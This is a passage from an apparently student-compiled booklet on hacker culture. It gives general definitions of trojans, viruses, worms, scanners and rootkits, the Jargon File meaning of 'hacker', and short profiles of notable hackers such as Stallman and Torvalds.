the criminal world and there would be no need to invent a word to define criminal or malicious locksmiths. The reason hackers face these kinds of problems is because the mass media tends to believe anyone who says they are a hacker - and people say they are hackers because of the mass media's sensationalist portrayals. This deceptive cycle will probably only come to an end with the education of reporters and the general public on what constitutes a hacker and what does not. A group known as the "Hacker Antidefamation League" has this goal.But, indeed, it's likely that the confusion and dissonance exists precisely because "hacking" describes a *skill set* -- akin to picking locks -- whose tools can be used both ethically and unethically, by both people who are basically ethical, and those who are not (these are two related, but separate distinctions -- what long-time system administrator has not violated a company policy by breaking into some company facility for an authorized user in order that that person can complete an important project?) This may well be the crux of the argument, in fact: so-called 'white-hat' hackers are uncomfortable at the exposure of the darker side of their skill-set, notwithstanding the fact that, like comicbook superheroes, they only utilize those skills for Good.Software cracking is the process of removing any sort of software enforced protection scheme from a piece of software.There are several recurring tools of the trade used by hackers to gain unauthorized access to computers:

Trojan horse

175

These are applications that seem to do useful work, but set up a back door so that the hacker can later return and enter the system. These include programs which mimic login screens. Viruses that fool a user into downloading and/or executing them by pretending to be useful applications are also sometimes called trojan horses.

Snooper
Applications that capture password and other data while it is in transit either within the computer, or over the network Virus -- An application that propagates itself opportunistically by waiting in the background until the user offers it a new medium to infect. The term came into usage by comparison with biological viruses, which reproduce by infecting a cell and taking advantage of its life functions. Similarly, computer viruses, unlike worms, embed themselves within files on the host system. When "infected" executables run, or sometimes when infected binary data files are read, the virus is able to spread to other binary format files on the local system, floppy disks or over the network. Viruses are often confused with worms. worm -- An application that actively probes for known weaknesses across the network, then propagates itself through an exploitation of those weaknesses. The original Usenet post describing the MorrisWorm described the distinction between viruses and worms thus: worms do not attach themselves to code. Popular usage appears to favour worms being more active than viruses. However, the Jargon File, as of version 4.4.1, maintains the original sense of the term. A Worm in this original sense is any independent program which reproduces itself over a network (a program reproducing itself on the local machine only repeatedly until the machine crashes is known as a wabbit). After the comparison between computer viruses and biological viruses, the obvious comparison here is to a bacterium.

Vulnerability Scanner
A tool used to quickly check computers on a network for known weaknesses. Hackers also use Port Scanners. These check to see which ports on a specified computer are "open" or available to acess the computer through. Exploit (computer science) -- A prepared application that takes advantage of a known science weakness Social engineering -- Asking someone for the password or account (possibly over a 176

beer.) Also includes looking over someone's shoulder while they enter their password, or posing as someone else in order to get sensitive information Root kit -- A toolkit for hiding the fact that a computer's security has been compromised. Root kits may include replacements for system binaries so that it becomes impossible to see applications being run by the intruder in the active process tables. Leet -- An English pidgin that helps to obscure hacker discussions and web sites, and Lee paradoxically it simplifies the location of resources in public search engines for those who know the language.

Hacker -- Grey Hat


1) A black-hat hacker turned white-hat. See below. 2) A white-hat hacker who uses black-hat techniques to satisfy their employers, for whom they act as white-hat.

177

Hacker -- White Hat


White hat hackers often overlap with black hat depending on your perspective. The primary difference is that a white hat hacker observes the hacker ethic, a sort of golden rule of computing similar to: Do unto others as you would have them do unto you. Like black hats, white hats are often intimately familiar with the internal details of security systems, and can delve into obscure machine code when needed to find a solution to a tricky problem without requiring support from a system manufacturer. An example of a hack: Microsoft Windows ships with the ability to use cryptographic libraries built into the operating system. When shipped overseas this feature becomes nearly useless as the operating system will refuse to load cryptographic libraries that haven't been signed by Microsoft, and Microsoft will not sign a library unless the US Government authorizes it for export. This allows the US Government to maintain some perceived level of control over the use of strong cryptography beyond its borders. While hunting through the symbol table of a beta release of Windows, a couple of overseas hackers managed to find a second signing key in the Microsoft binaries. That is without disabling the libraries that are included with Windows (even overseas) these individuals learned of a way to trick the operating system into loading a library that hadn't been signed by Microsoft, thus enabling the functionality which had been lost to non-US users. Whether this is good (white hat) or bad (black hat) may depend on whether you are the US Government or not, but is generally considered by the computing community to be a white hat type of activity.

How Some Hackers Define Themselves


The following is the definition given by the jargon file (a dictionary of hacker jargon) accepted by some (but not all) in the hacker community:

hacker n. [originally, someone who makes furniture with an axe]

178

1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary. 2. One who programs enthusiastically (even obsessively) or who enjoys programming rather than just theorizing about programming. 3. A person capable of appreciating hack value. 4. A person who is good at programming quickly. 5. An expert at a particular program, or one who frequently does work using it or on it; as in `a Unix hacker'. (Definitions 1 through 5 are correlated, and people who fit them congregate.) 6. An expert or enthusiast of any kind. One might be an astronomy hacker, for example. 7. One who enjoys the intellectual challenge of creatively overcoming or circumventing limitations. 8. [deprecated] A malicious meddler who tries to discover sensitive information by poking around. Hence `password hacker', `network hacker'. The correct term for this sense is cracker. The term `hacker' also tends to connote membership in the global community defined by the net (see the network and Internet address). For discussion of some of the basics of this culture, see the How To Become A Hacker FAQ. It also implies that the person described is seen to subscribe to some version of the hacker ethic. It is better to be described as a hacker by others than to describe oneself that way. Hackers consider themselves something of an elite (a meritocracy based on ability), though one to which new members are gladly welcome. There is thus a certain ego satisfaction to be had in identifying yourself as a hacker (but if you claim to be one and are not, you'll quickly be labeled bogus). See also geek, wannabee. This term seems to have been first adopted as a badge in the 1960s by the hacker culture surrounding TMRC and the MIT AI Lab. We have a report that it was used in a sense close to this entry's by teenage radio hams and electronics tinkerers in the mid-1950s.

179

Notable Hackers
Richard Stallman -- A hacker of the old school, Stallman walked in off the street and got a job at MIT's Artificial Intelligence Lab in 1971. Stallman is a legendary hacker, the founder of the free software movement, a MacArthur "genius grant" recipient and a programmer capable of prodigious exploits. Ken Thompson and Dennis Ritchie -- The driving creative force behind Bell Labs' legendary computer science operating group, Ritchie and Thompson created UNIX in 1969. Steve Wozniak -- The co-founder of Apple Computer got his start making devices for phone phreaking. Linus Torvalds -- Torvalds was a computer science student at the University of Helsinki when he wrote the Linux kernel in 1991. Eric S. Raymond -- He is one of the founder of the Open Source Initiative and he wrote the famous text The Cathedral and the Bazaar and many other essays. He also maintains the Jargon File for the Hacker culture, which was previously maintained by Guy L. Steele, Jr.. Larry Wall -The creator of the Perl programming language. Johan Helsingius -- Operated the world's most popular anonymous remailer, the Penet remailer (called penet.fi), until he closed up shop in September 1996. Tsutomu Shimomura -- Shimomura outhacked and outsmarted Kevin Mitnick, the United States's most infamous hacker, in early 1994.

Back

180

PREPARED BY

NIKHIL KHANDELWAL (Leader, Supervisor, Page Designer) RAHUL GUPTA (Ass. Leader, Editor, Page Designer ) ARPIT GARG (Main Source Collector, Page Designer) MRIGESH BHANDARI (Source Collector) SHIKHA AGARWAL (Source Collector) NEHA JAIN (Source Collector) MANISH PUROHIT (Source Collector)

Back

181